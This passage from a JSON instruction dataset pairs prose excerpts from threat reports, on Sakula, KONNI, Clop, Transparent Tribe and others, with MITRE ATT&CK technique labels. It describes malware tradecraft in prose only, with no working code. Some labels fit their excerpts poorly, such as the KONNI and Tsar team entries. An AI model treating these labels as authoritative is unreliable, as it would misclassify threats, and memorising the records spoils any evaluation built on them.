performed detailed analysis on 346 Sakula samples, including the installer and all dropped files used by the malware to run. Source: Dell SecureWorks) . Installation . In most of the samples collected by the CTU research team, Sakula maintains persistence by setting the registry Run key (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\) in either the HKLM or HKCU hive. In the samples compiled in 2014, the adversary switched to adding the Run key by invoking cmd.exe: The registry value and filename vary by sample. Three of the analyzed samples placed files in %APPDATA%, while the remaining Sakula samples placed files in a directory under %ALLUSERSPROFILE%. A small number of samples did not use an additional subdirectory. The msi.dll file is configured to read and XOR-decode setup.msi, also located in the same directory, and run it in memory. Based on whether the compromised system is 32-bit or 64-bit, the appropriate file is written and run using cmd.exe calling rundll32 on the DLL with the PlayWin32 or PlayWin64 export. Center509671.dat). In a small group of Sakula samples from 2013, the install process also modified the hosts file to point some of the victim's subdomains to various IP addresses within the victim's own organization. The malware also registered a file as a command component within the registry. In the Sakula samples where the install process performed cleanup, the malware invoked cmd.exe", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The data found within this file is encrypted using a single-byte xor key of 0x41. The file header structure, with the underlying data still encrypted, can be seen below", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Since version 0.2.6 This function creates a Kerberos ticket with given user details and server (usually AZUREADSSOACC) password. Uses only user\u2019s SID and server password", + "output": "- T1558.002: Steal or Forge Kerberos Tickets - Silver Ticket" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the anti-analysis checks are complete, the loader starts preparing the infected environment for the downloading of additional payloads. There are 3 download attempts (and thus 3 GET requests trailing by a different numeric ID), the payloads are downloaded subsequently to the user\u2019s %temp% folder", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In 2018, CTU researchers observed several GOLD KINGSWOOD campaigns involving SpicyOmelette, a tool used by the group during initial exploitation of an organization. This sophisticated JavaScript remote access tool is generally delivered via phishing, and it uses multiple defense evasion techniques to hinder prevention and detection activities. GOLD KINGSWOOD delivered SpicyOmelette through a phishing email containing a shortened link that appeared to be a PDF document attachment. When clicked, the link used the Google AppEngine to redirect the system to a GOLD KINGSWOOD-controlled Amazon Web Services (AWS) URL that installed a signed JavaScript file, which was SpicyOmelette", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Putty \u2013 can be leveraged by attackers for remote access, to exfiltrate data and send it back to attackers - PSExec \u2013 is a legitimate Microsoft tool that can be exploited by malicious actors and used for lateral movement across victim networks - SNScan \u2013 this tool can be used for network reconnaissance, to find other potential targets on victim networks - WinRAR \u2013 is an archiving tool that can be used to compress files (potentially to make them easier to send back to attackers) and also to extract files from zipped folders", + "output": "- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For example, ORat uses a WMI event consumer to maintain its presence on a compromised host. The group also creates and maintains scheduled tasks to achieve this purpose", + "output": "- T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection", + "output": "- T1489: Service Stop" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"For instance, the character A would be represented by the two characters 41, which is the hexadecimal representation of that character. The run command (1) creates the process cmd.exe /c with the command parameters appended and will write the output of the command in hexadecimal format to the file %APPDATA%\\tmpCa.vbs. The Trojan will then read the hexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to the C2 server via an HTTP GET request to a URL with the following structure: http://<c2 domain>/resp. hex(Environment.UserName/Environment.MachineName)>AAZ<hex(command prompt output)> The upload command (2) writes data provided by the C2 to a specified file. hex(Environment.UserName/Environment.MachineName)>AAZ<hex(\"\"File Uploaded\"\")> The download command (3) reads the contents of a specified file and sends the data to the C2 server. If the file does not exist, the Trojan will send the C2 server a message < File Not Found > by sending the following URL: http://<c2 domain>/resp. hex(Environment.UserName/Environment.MachineName)>AAZ<hex(\"\"< File Not Found >\"\")> If the file exists, the Trojan will read the contents of the specified file and compresses the contents using the GZipStream class. The Trojan then gets the hexadecimal values of the compressed data and will replace the following hexadecimal values on each line with ASCII characters to further compressed the data\"", + "output": "- T1560.003: Archive Collected Data - Archive via Custom Method" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These events will run respectively at 15:30:40 and when the system uptime is between 300 and 400 seconds. The variable $HL39fjh contains the base64-encoded PowerShell command shown in Figure 2. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This transport library does not appear on disk in its PE format. It is maintained as encrypted resource 107 in the orchestrator module, then decrypted and loaded by the orchestrator directly into the memory of the target process. This C2 interaction module is independent, once started, it interacts with the orchestrator using its local named pipe", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Finally, OverWatch observed AQUATIC PANDA make multiple attempts at credential harvesting by dumping the memory of the LSASS process3 using living-off-the-land binaries rdrleakdiag.exe and cdump.exe \u2014 a renamed copy of createdump.exe. The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\\temp\\ directories", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory\n- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The inclusion of both phone and IMSI numbers show the highly targeted nature of this cyber intrusion. If an SMS message contained either a phone number or an IMSI number that matched the predefined list, it was saved to a CSV file for later theft by the threat actor", + "output": "- T1074.001: Data Staged - Local Data Staging\n- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The program CrashReporter.exe is heavily obfuscated with the ADVObfuscation library, renamed \u201csnowman\u201d (Obfuscated Files or Information [T1027]). When run, it checks for the Maintain parameter and collects the victim\u2019s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (Exfiltration Over C2 Channel [T1041]). The program also creates a scheduled SYSTEM task, named JMTCrashReporter, which runs CrashReporter.exe with the Maintain parameter at any user\u2019s login (Scheduled Task/Job: Scheduled Task [T1053.005", + "output": "- T1027: Obfuscated Files or Information\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The function hashing algorithm is used to map a hash value of a given function name to its corresponding location in memory using a process known as Run-Time Dynamic Linking. Pre-computed hashes are passed to the hashing algorithm alongside the Windows library containing the related function name. Each function name within the library is hashed; when a match is found, its address is saved", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As mentioned, the registry key (HKLM\\SOFTWARE\\Microsoft\\DRM) is where the malicious payload is stored. In this case, this is the Pillowmint Trojan. Pillowmint is stored and compressed in the registry key", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The ultimate goal of both Type A and B loaders is to de-obfuscate and load a Cobalt Strike Reflective Loader in memory. At the conclusion of the de-obfuscation process, both variants proceed to load the Reflective Loader in memory, which subsequently executes Cobalt Strike Beacon in memory", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as \u201cTinymet\u201c. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (eg. with the key equal to 0x50 or 0x51) piece of meterpreter shellcode to execute", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables", + "output": "- T1055.012: Process Injection - Process Hollowing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IRON TWILIGHT\u2019s email credential targeting system allows the threat group to target and exploit accounts for webmail services such as Gmail and Hotmail, as well as corporate email platforms that use webmail interfaces. When targeting email services that provide alternate methods to authenticate account access, such as Gmail\u2019s use of OAuth, the threat actors may abuse this feature to maintain a persistent session with the compromised account", + "output": "- T1566.002: Phishing - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "From these web shells, they launched reconnaissance commands, stole data, and dropped additional tools including portqry.exe, renamed cmd.exe, winrar, and the notorious hTran", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. Works with Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex. File listing plugin: Works on local or remote drives and can map additional paths when given credentials", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"X-Session: 0\"\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. DLL side loading has been used to maintain persistence on the compromised system. Source: Dell SecureWorks) - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. The server-side component provides a simple graphical user interface for threat actors interacting with web shells. TG-3390 has used additional web shells containing similarly formatted passwords\"", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After this registry change, ShowCompColor and ShowInfoTip keys are also modified to disable the display of compressed and encrypted NTFS files in color. This setting allows you to see compressed files in a blue color", + "output": "- T1112: Modify Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After successfully exporting mail they wished to steal, the attacker would remove the evidence of the export request using Remove-MailboxExportRequest", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once executed, NavRAT will immediately leverage cmd.exe to perform a systeminfo and a tasklist check on the system it is running on while writing the output to a TMP file, once again attempting to hide within an AhnLab folder. Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We found four different trojaned binaries in use since July 2019. The 5kplayer, driver pack and Firefox trojanized software use a service to achieve persistence. The VPNpro trojanized application uses an AutoRun registry key, as mentioned in the publication released before July 2019. After that, it will check if ESET or BitDefender antivirus are installed before dropping the malware", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel.Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible.Figure 2: Fake website cloned using HTTrack on May 29, 2020. Lures and targeting . Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures . Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. HoneyTraps . Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. Transparent Tribe also delivers malicious archives containing CrimsonRAT executables using various themes, including honeytraps. Conclusion . Transparent Tribe relies heavily on the use of maldocs to spread their Windows implants. Transparent Tribe uses generically themed content-hosting domains as well as malicious domains masquerading as legitimate defense-related websites", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the macro collected all the information, it sends the data to the C2 server over an HTTP POST request", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The main function within the ISMInjector assembly uses the Joiner module to construct the final payload and the Inner module to inject the final payload into a process. Figure 4 shows the ISMInjector\u2019s main function that uses the two modules to carry out its injection process before exiting", + "output": "- T1055.012: Process Injection - Process Hollowing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe", + "output": "- T1218.010: System Binary Proxy Execution - Regsvr32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Almost exclusively, Unit 42 has seen the use of weaponized documents that require user execution. Only once in the last six months have we seen use of exploits to circumvent the need for the user to execute any part of the installation chain", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attacker created password-protected archives on the victims' OWA server so that they could be exfiltrated via a simple HTTP request", + "output": "- T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Camouflage and blending into the environment. ADFIND legit tool) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations. The firewall rules were also methodically removed after the network reconnaissance was completed. Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "For example, we recently disclosed the activities of one of those teams (dubbed Tsar team) surrounding the use of mobile malware. This team has previously launched campaigns targeting the United States and European intelligence communities, militaries, defense contractors, news organizations, NGOs and multilateral organizations. It has also targeted jihadists and rebels in Chechnya", + "output": "- T1027: Obfuscated Files or Information" + }, + { 